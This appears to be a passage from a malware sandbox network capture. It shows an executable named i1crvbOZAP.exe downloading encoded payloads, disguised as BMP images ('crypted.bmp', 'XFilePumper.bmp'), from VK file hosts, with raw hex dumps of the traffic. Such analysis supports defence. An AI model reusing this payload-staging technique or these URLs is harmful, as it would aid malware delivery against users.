6d 65 32 7d 2c 20 7b 6e 61 6d 65 33 7d 2c 20 7b 6e 61 6d 65 34 7d 20 61 6e 64 20 7b 6e 7d Data Ascii: {name3}, {name4} and{name5} received your gift: {products}","{name1}, {name2}, {name3}, {name4} and{name5} received your gifts: {products}"],"purchases_stickers_gift_result_4_recipients_and_n_more_single":["","{name1}, {name2}, {name3}, {name4} and {n}
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 65 6d 5f 69 6e 5f 73 74 6f 63 6b 22 3a 22 49 6e 20 73 74 6f 63 6b 22 2c 22 6d 61 72 6b 65 74 5f 69 74 65 6d 5f 73 74 6f 63 6b 5f 70 69 65 63 65 5f 61 6d 6f 75 6e 74 22 3a 22 70 63 73 2e 22 2c 22 6d 61 72 6b 65 74 5f 68 65 61 64 65 72 5f 73 65 61 72 63 68 22 3a 22 53 65 61 72 63 68 20 4d 61 72 6b 65 74 22 2c 22 6d 61 72 6b 65 74 5f 63 61 74 61 6c 6f 67 5f 68 6f 6d 65 5f 62 72 65 61 64 63 72 75 6d 62 22 3a 22 48 6f 6d 65 22 2c 22 63 6c 61 73 73 69 66 69 65 64 73 5f 6e 65 77 5f 69 74 65 6d 5f 63 61 72 64 5f 65 6d 70 74 79 5f 72 65 76 69 65 77 73 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 68 65 61 64 65 72 5f 6f 77 6e 65 72 22 3a 22 52 65 76 69 65 77 73 20 6f 66 a0 79 6f 75 72 a0 70 72 6f 64 75 63 74 20 77 69 6c 6c 20 61 70 70 65 61 72 20 68 65 72 65 22 2c 22 63 Data Ascii: em_in_stock":"In stock","market_item_stock_piece_amount":"pcs.","market_header_search":"Search Market","market_catalog_home_breadcrumb":"Home","classifieds_new_item_card_empty_reviews_placeholder_header_owner":"Reviews ofyourproduct will appear here","c
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 6c 5f 73 75 62 68 65 61 64 22 3a 22 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 22 2c 22 70 68 6f 74 6f 73 5f 66 61 69 6c 5f 69 6e 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 6d 6f 64 61 6c 5f 74 65 78 74 22 3a 22 46 61 69 6c 65 64 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 61 63 74 69 6f 6e 22 2c 22 70 68 6f 74 6f 73 5f 61 6c 62 75 6d 5f 73 65 74 74 69 6e 67 73 5f 66 6f 6f 74 6e 6f 74 65 22 3a 22 53 65 6c 65 63 74 20 61 6c 62 75 6d 73 20 73 6f 20 74 68 65 69 72 20 70 68 6f 74 6f 73 3c 62 72 3e 61 70 70 65 61 72 20 69 6e a0 74 68 65 a0 50 68 6f 74 6f 73 20 74 61 62 22 2c 22 70 68 6f 74 6f 73 5f 61 6c 62 75 6d 5f 73 65 74 74 69 6e 67 73 5f 74 69 74 6c 65 22 3a 22 50 68 6f 74 6f 73 20 74 61 62 22 2c 22 70 68 6f 74 6f 73 5f 74 61 67 73 5f 6d 6f 64 61 6c 5f 74 69 74 Data Ascii: l_subhead":"Please try again","photos_fail_in_background_modal_text":"Failed to complete action","photos_album_settings_footnote":"Select albums so their photos<br>appear inthePhotos tab","photos_album_settings_title":"Photos tab","photos_tags_modal_tit
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 79 5f 64 61 74 65 22 3a 22 42 79 20 64 61 74 65 20 75 70 6c 6f 61 64 65 64 22 2c 22 73 65 61 72 63 68 5f 76 69 64 65 6f 5f 62 79 5f 64 75 72 61 74 69 6f 6e 22 3a 22 42 79 20 64 75 72 61 74 69 6f 6e 22 2c 22 73 65 61 72 63 68 5f 76 69 64 65 6f 5f 62 79 5f 72 65 6c 65 76 61 6e 63 65 22 3a 22 42 79 20 72 65 6c 65 76 61 6e 63 65 22 2c 22 73 65 61 72 63 68 5f 61 6e 79 5f 76 69 64 65 6f 5f 64 75 72 61 74 69 6f 6e 22 3a 22 41 6c 6c 20 76 69 64 65 6f 73 22 2c 22 73 65 61 72 63 68 5f 73 68 6f 72 74 5f 76 69 64 65 6f 5f 64 75 72 61 74 69 6f 6e 22 3a 22 53 68 6f 72 74 22 2c 22 73 65 61 72 63 68 5f 6c 6f 6e 67 5f 76 69 64 65 6f 5f 64 75 72 61 74 69 6f 6e 22 3a 22 4c 6f 6e 67 22 2c 22 73 65 61 72 63 68 5f 76 69 64 65 6f 5f 68 64 22 3a 22 48 69 67 68 20 64 65 66 69 6e Data Ascii: y_date":"By date uploaded","search_video_by_duration":"By duration","search_video_by_relevance":"By relevance","search_any_video_duration":"All videos","search_short_video_duration":"Short","search_long_video_duration":"Long","search_video_hd":"High defin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49789	95.142.206.1	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:04 UTC	425	OUT	GET /c909328/u329118071/docs/d30/0bb5ce760b73/XFilePumper.bmp?extra=LfaiwsuY5AI1SgCQ2hZu1AgxBMymxLFFBDyOdai5jngk90oTeFijtt7Ic4wsMIEOy9NwgH9QmImjTPk5bd8yAGOmRqX65U99IViGTY1ZCiw1fayo7Fo0G4owW8CZYZOPW10clBZcrnDnQ8o HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: sun6-21.userapi.com Connection: Keep-Alive
2024-03-28 08:15:05 UTC	585	IN	HTTP/1.1 200 OK Server: kittenx Date: Thu, 28 Mar 2024 08:15:05 GMT Content-Type: image/x-ms-bmp Content-Length: 206852 Connection: close Last-Modified: Thu, 21 Mar 2024 17:25:18 GMT ETag: "65fc6d7e-32804" Expires: Sat, 27 Apr 2024 08:15:05 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic X-Trace-Id: YSHXpyVBduLWEWlUPCVzg1hkmF74gg Accept-Ranges: bytes
2024-03-28 08:15:05 UTC	15799	IN	Data Raw: dd cc 66 55 58 4f 85 15 16 15 15 15 11 15 15 15 ea ea 15 15 ad 15 15 15 15 15 15 15 ff 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 95 15 15 15 1b 80 af 1b 15 a1 1c d8 34 ad 14 59 d8 34 41 7d 7c 66 35 65 67 7a 72 67 74 78 35 76 74 7b 7b 7a 61 35 77 70 35 67 60 7b 35 7c 7b 35 51 5a 46 35 78 7a 71 70 3b 18 18 1f 31 15 15 15 15 15 15 15 45 50 15 15 59 14 16 15 91 9d fc e8 15 15 15 15 15 15 15 15 f5 15 37 15 1e 14 25 15 15 0b 16 15 15 1d 15 15 15 15 15 15 53 28 16 15 15 35 15 15 15 ff 16 15 15 15 ff 15 15 35 15 15 15 17 15 15 11 15 15 15 15 15 15 15 13 15 15 15 15 15 15 15 15 95 16 15 15 17 15 15 ed e8 16 15 17 15 75 90 15 15 01 15 15 01 15 15 15 15 01 15 15 01 15 15 15 15 15 15 01 15 15 15 15 15 15 Data Ascii: fUXO4Y4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;1EPY7%S(55u
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 72 3f 3f c2 48 29 ed 62 ad 86 72 07 95 a6 02 41 82 7f 57 e1 4e ab a4 5e 22 c4 b0 a6 f8 9a 9d 9d a7 c6 28 dd ec 56 46 65 ce c1 ec 20 f0 23 90 81 62 8b 5c 15 19 b0 e1 a2 bf 01 86 6e 80 a6 f8 9a 9d 9d e3 53 78 5a b9 ca 19 a7 37 25 bc b1 49 49 7a 4e ff 6c f3 9c 11 f5 99 df 38 12 bc 9f ed 7c f7 4d 5e 51 52 81 78 6a 51 51 81 b6 8d 30 c4 07 fc 6a 34 bc 1d 64 d0 b9 bf c0 92 cf 0a 47 4b 6c 37 14 1d 35 27 1a ff ca d7 f7 e4 3f 5b 03 eb 04 04 c4 cb 7c 19 0e c5 b8 d1 a3 ff 0a 5e bd 62 cf 0d 47 cb ad 2b 14 8d a3 75 e0 c1 95 37 db 58 09 7e 1d e0 ca cb 84 9d 9d 3d 02 f3 35 78 94 8f 01 4a 8c a3 65 d8 21 8e 57 df 0e 62 32 15 47 1f 58 c4 f3 14 de 7e d8 9d 8d 03 cf b7 a9 ef 32 37 b7 e9 7d 98 0f 1d 0e e8 7b 3c 9e 95 97 6c ad 5c af ef 09 fd fd f5 3e 3f c2 eb 4d 46 65 57 f7 4d Data Ascii: r??H)brAWN^"(VFe #b\nSxZ7%IIzNl8\|M^QRxjQQ0j4dGKl75'?[\|^bG+u7X~=5xJe!Wb2GX~27}{<l\>?MFeWM
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 06 d5 3d 3c b1 41 8d bd 4f 27 62 5f ba 3e f2 e1 bf 11 25 b2 b1 77 15 f2 ed 2c 12 2b d6 0d 3e 17 15 3c 70 86 30 cc 37 13 ec 27 8d 49 a4 e9 af 5c 83 3e a4 38 b8 ad 51 74 f9 9a 09 ad b1 fe da b1 81 9d 0d 23 0f 47 03 a7 64 cd 7a 62 11 0a 9b 14 14 55 10 8f 17 d3 2b 6f 6f 1f 3c ca a6 b1 e9 c3 9f ac 86 cb 66 34 29 49 a6 a1 49 90 71 42 5e a5 8e 40 33 7a 71 99 55 16 95 81 1d 1e dd 6a 1e 3c 80 6d 68 fb b1 53 22 77 2e 08 a8 33 14 d9 3b 3c 8a b5 64 eb 13 76 0d 6f a9 ca 84 47 23 cc 83 e8 8f 41 ed 5e c7 d3 8e 3e 7b 8d 81 e3 ee fe be 5e df 12 ed 20 e0 c2 d7 03 62 a5 3b c8 bf 57 5f 21 fe 03 0f 47 43 ba c9 f7 ce 58 2b db 25 35 b5 b7 dd ba 97 62 5c 11 07 01 03 f6 5a 1c c6 ef c4 df fe c6 6a a4 d8 3b bc 45 2d 86 26 8c 01 a2 3d 9f 67 06 76 b9 ca e4 6b 42 5f 4c b8 1e 2c fe 98 Data Ascii: =<AO'b_>%w,+><p07'I\>8Qt#GdzbU+oo<f4)IIqB^@3zqUj<mhS"w.3;<dvoG#A^>{^ b;W_!GCX+%5b\Zj;E-&=gvkB_L,
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 Data Ascii:
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea ac 00 09 f7 1f 1d 14 20 54 21 1c 11 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 3a 33 12 55 79 42 01 84 d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 Data Ascii: T!:3UyB
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea b1 91 0d 05 0a 01 16 2a 17 17 15 38 02 07 16 1c 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 04 1b 17 18 15 15 15 25 35 0f 11 5c a1 84 0e ce d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 Data Ascii: *8%5\
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 Data Ascii:
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 15 7d 41 1a 03 d2 b5 0b e1 d8 b0 80 ea d9 b1 0b eb d9 b1 0b eb d8 b0 80 ea d9 b1 0b eb d9 b1 0b eb d8 b0 80 ea d9 b1 0b eb d9 b1 0b eb d8 b0 80 ea d9 b1 0b eb d9 b1 0b eb d8 b0 80 ea d9 b1 0b eb d9 b1 0b eb d8 b0 80 ea d9 b1 0b eb d9 b1 0b eb d9 b1 0b eb d8 b0 80 ea d2 b5 0b e1 7a 4c 01 55 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 Data Ascii: }AzLU
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 1f 1d 14 0c 01 18 17 2b b5 94 0d d3 d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea ea ea eb ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 80 ea d8 b0 Data Ascii: +
2024-03-28 08:15:05 UTC	16384	IN	Data Raw: 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea ea e9 15 15 2a ea ea ea ea ea ea ea ea ed 15 15 80 ea ea ea ea ea ea ea ea ed 15 15 80 ea ea ea ea ea ea ea ea ed 15 15 80 ea ea ea ea ea ea ea ea ed 15 15 80 ea ea ea ea ea ea ea ea e5 15 15 1a ea ea ea ea ea ea ea ea e5 15 15 1a ea ea ea ea ea ea ea ea e5 15 15 1a ea ea Data Ascii: *

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49791	93.186.225.194	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:06 UTC	324	OUT	GET /doc329118071_676351627?hash=Prtaj0ZgUNfFsiq7F7Grkvgpr1vjXL0n0VmegSdJgKX&dl=o8jO07ZxaFiNzZmXTClzRvzF7C8XmRKzZNeLFFTGXhX&api=1&no_preview=1#mene HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache
2024-03-28 08:15:06 UTC	1222	IN	HTTP/1.1 302 Found Server: kittenx Date: Thu, 28 Mar 2024 08:15:06 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: close X-Powered-By: KPHP/7.4.116219 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixlang=3; expires=Wed, 26 Mar 2025 07:24:27 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixstlid=9075907311564224918_zxqH5sAk4WPtIkoMclrPvYh18ZvTWHdqjWUyn3U1Xcs; expires=Fri, 28 Mar 2025 08:15:06 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Location: https://sun6-21.userapi.com/c240331/u329118071/docs/d55/1831d7ba0e1f/crypted.bmp?extra=HVpBxhMcgZ3WEnQYJhUos_wUIgTD581u41drks9QawpVXgm6isoag9sFNXT6kFUNfmKUK0BATli7elFkZwxPtLGKC8Bc8453Aje1s8sxPwGBrTh5BDTLmWOuBUzVCNDrUBjJqzwS0s4DvCA X-Frontend: front661700 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: jbXZve6yZuL168g94sptyzCHsNpq9g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49792	95.142.206.2	443	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:06 UTC	421	OUT	GET /c909218/u329118071/docs/d56/4889f8ef891f/crypted.bmp?extra=-LBKaniv3MRw05ku3d9Nr104OdGpfnHeS5WOM7N4VWIoDXtSDCsvx-PvX4usDvxD9PpMarCAxpv-2NOeS4PDQq1WB5ljz_YtSA7SRvFwbLxszvLa9N7DPL7VqJF6YMSwG6COqmXFKEg_y4Q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: sun6-22.userapi.com Connection: Keep-Alive
2024-03-28 08:15:06 UTC	585	IN	HTTP/1.1 200 OK Server: kittenx Date: Thu, 28 Mar 2024 08:15:06 GMT Content-Type: image/x-ms-bmp Content-Length: 401548 Connection: close Last-Modified: Wed, 27 Mar 2024 13:37:57 GMT ETag: "66042135-6208c" Expires: Sat, 27 Apr 2024 08:15:06 GMT Cache-Control: max-age=2592000 X-Frontend: front6-22 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic X-Trace-Id: UN2prK-IoUzImIKqK8edCLlX1a7M9g Accept-Ranges: bytes
2024-03-28 08:15:06 UTC	15799	IN	Data Raw: dd cc 66 55 58 4f 85 15 16 15 15 15 11 15 15 15 ea ea 15 15 ad 15 15 15 15 15 15 15 ff 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 95 15 15 15 1b 80 af 1b 15 a1 1c d8 34 ad 14 59 d8 34 41 7d 7c 66 35 65 67 7a 72 67 74 78 35 76 74 7b 7b 7a 61 35 77 70 35 67 60 7b 35 7c 7b 35 51 5a 46 35 78 7a 71 70 3b 18 18 1f 31 15 15 15 15 15 15 15 45 50 15 15 59 14 16 15 a0 1b 11 73 15 15 15 15 15 15 15 15 f5 15 1b 14 1e 14 1e 15 15 dd 10 15 15 1d 15 15 15 15 15 15 7b f3 10 15 15 35 15 15 15 15 13 15 15 15 ff 15 15 35 15 15 15 17 15 15 11 15 15 15 15 15 15 15 13 15 15 15 15 15 15 15 15 ff 13 15 15 17 15 15 15 15 15 15 16 15 75 90 15 15 01 15 15 01 15 15 15 15 01 15 15 01 15 15 15 15 15 15 01 15 15 15 15 15 15 Data Ascii: fUXO4Y4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;1EPYs{55u
2024-03-28 08:15:07 UTC	16384	IN	Data Raw: 3d 61 15 15 13 0f ff db e0 ea ea 35 a7 15 15 15 3d aa 15 15 13 2c 28 ce ea ea 33 35 bf 15 15 15 2d 27 ce ea ea eb 19 5a 15 35 16 15 15 15 eb 19 0e 15 89 35 20 17 15 15 2d 0f ce ea ea 35 95 15 15 15 35 3f 15 15 15 4c eb 1b 0e 15 35 19 14 15 15 3d ab 15 15 13 2f e9 cf ea ea 33 35 e8 15 15 15 2d e4 cf ea ea eb 19 5a 15 35 12 15 15 15 eb 19 0e 15 89 35 43 14 15 15 2d cc cf ea ea 67 95 11 15 65 03 3d 60 15 15 13 0a 3d 63 15 15 13 2f 35 f3 ea ea 35 bc 14 15 15 2d ac cf ea ea 04 41 3d 86 15 15 13 06 60 35 3b 15 15 15 3d ab 15 15 13 2f b4 cf ea ea 33 35 13 15 15 15 2d 83 cf ea ea 2d 42 ee ea ea 35 f4 14 15 15 2d 92 cf ea ea 80 3d 98 08 15 15 14 30 c5 23 15 15 11 3d ae 15 15 13 06 0d 35 31 14 15 15 2d 7c cf ea ea 04 60 0f ff 57 1d 15 15 35 59 15 15 15 3d ab 15 15 Data Ascii: =a5=,(35-'Z55 -55?L5=/35-Z55C-ge=`=c/55-A=`5;=/35--B5-=0#=51-\|`W5Y=
2024-03-28 08:15:07 UTC	16384	IN	Data Raw: 15 2d 44 8e ea ea 04 66 04 27 02 4d 04 7b 02 84 89 35 0b 14 15 15 2d 29 8e ea ea 04 41 3d 86 15 15 13 33 35 17 14 15 15 2d 3f 8e ea ea 07 30 3d 91 15 15 1f 95 3c 15 15 11 35 f9 14 15 15 2d 0a 8e ea ea 35 98 15 15 15 35 4c 15 15 15 4d eb 1b 0e 15 35 65 14 15 15 2d ee 8f ea ea 03 06 04 35 38 17 15 15 2d fb 8f ea ea 04 7a 04 4a 04 63 35 ea 15 15 15 4a c7 89 35 b5 14 15 15 2d c3 8f ea ea 35 bd 15 15 15 35 2d 15 15 15 4c eb 1b 0e 15 35 70 14 15 15 2d a8 8f ea ea eb 19 10 15 35 01 15 15 15 35 0f 15 15 15 35 67 15 15 15 4d 89 35 0f 17 15 15 eb 1b 3a 15 2d 83 8f ea ea eb 19 5a 15 35 10 15 15 15 35 6b 15 15 15 35 3f 15 15 15 4c 89 35 0e 15 15 15 3d ab 15 15 13 2f 63 8f ea ea 33 35 0e 15 15 15 2d 7e 8f ea ea 04 16 2f 51 f1 ea ea 35 66 17 15 15 2d 4f 8f ea ea 04 29 Data Ascii: -Df'M{5-)A=35-?0=<5-55LM5e-58-zJc5J5-55-L5p-555gM5:-Z55k5?L5=/c35-~/Q5f-O)
2024-03-28 08:15:07 UTC	16384	IN	Data Raw: 50 57 45 7f 52 6c 15 66 45 27 51 5d 6d 65 64 50 20 15 76 5d 57 51 65 6c 21 24 2d 5f 15 4d 21 7c 51 61 44 62 23 47 5f 15 53 77 6d 51 5c 72 5c 40 65 23 15 66 45 7b 51 57 61 71 78 65 56 15 51 22 26 51 25 53 72 63 2d 45 15 46 7a 67 61 70 71 59 7c 66 61 15 7c 25 56 51 23 23 26 66 6c 7c 15 42 74 5a 51 27 2d 52 56 4d 7d 15 6c 78 40 51 71 76 52 79 5d 42 15 61 42 71 51 40 23 4d 44 79 42 15 52 40 5e 51 7e 21 70 2c 2c 60 15 6c 50 59 51 52 57 51 66 5c 5a 15 46 25 43 5e 7c 72 52 5f 74 15 5d 76 59 51 6d 6d 64 20 4c 5f 15 66 70 61 4a 40 66 70 58 74 76 7d 7c 7b 70 5e 70 6c 46 61 7a 67 70 15 42 7d 5d 6c 56 45 66 4f 7e 15 5b 24 20 4d 27 76 4c 26 5f 15 35 15 40 5c 7b 61 23 21 15 57 7c 61 56 7a 7b 63 70 67 61 70 67 15 52 70 61 57 6c 61 70 66 15 56 7a 65 6c 15 5b 42 5b 65 20 Data Ascii: PWERlfE'Q]medP v]WQel!$-_M!\|QaDb#G_SwmQ\r\@e#fE{QWaqxeVQ"&Q%Src-EFzgapqY\|fa\|%VQ##&fl\|BtZQ'-RVM}lx@QqvRy]BaBqQ@#MDyBR@^Q~!p,,`lPYQRWQf\ZF%C^\|rR_t]vYQmmd L_fpaJ@fpXtv}\|{p^plFazgpB}]lVEfO~[$ M'vL&_5@\{a#!W\|aVz{cpgapgRpaWlapfVzel[B[e
2024-03-28 08:15:07 UTC	16384	IN	Data Raw: 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 ea ea ea ea ea ea ea ea 1e 17 15 17 14 54 15 14 15 15 15 ea ea ea ea 14 15 15 15 15 15 15 15 19 17 15 15 15 5c 46 6c 66 61 70 78 39 35 43 70 67 66 7c 7a 7b 28 21 3b 25 3b 25 3b 25 39 35 56 60 79 61 60 67 70 28 7b 70 60 61 67 74 79 39 35 45 60 77 79 7c 76 5e 70 6c 41 7a 7e 70 7b 28 77 22 22 74 20 76 20 23 24 2c 26 21 70 25 2d 2c 10 14 15 15 15 80 46 6c 66 61 70 78 3b 56 7a 71 70 51 7a 78 3b 58 70 78 77 70 67 54 61 61 67 7c 77 60 61 70 66 14 15 15 15 12 63 74 79 60 70 4a 4a 15 1d 17 15 15 15 15 75 15 15 1e 17 15 57 15 14 15 15 15 ea ea ea ea Data Ascii: T\Flfapx95Cpgf\|z{(!;%;%;%95V`ya`gp({p`agty95E`wy\|v^plAz~p{(w""t v #$,&!p%-,Flfapx;VzqpQzx;XpxwpgTaag\|w`apfcty`pJJuW
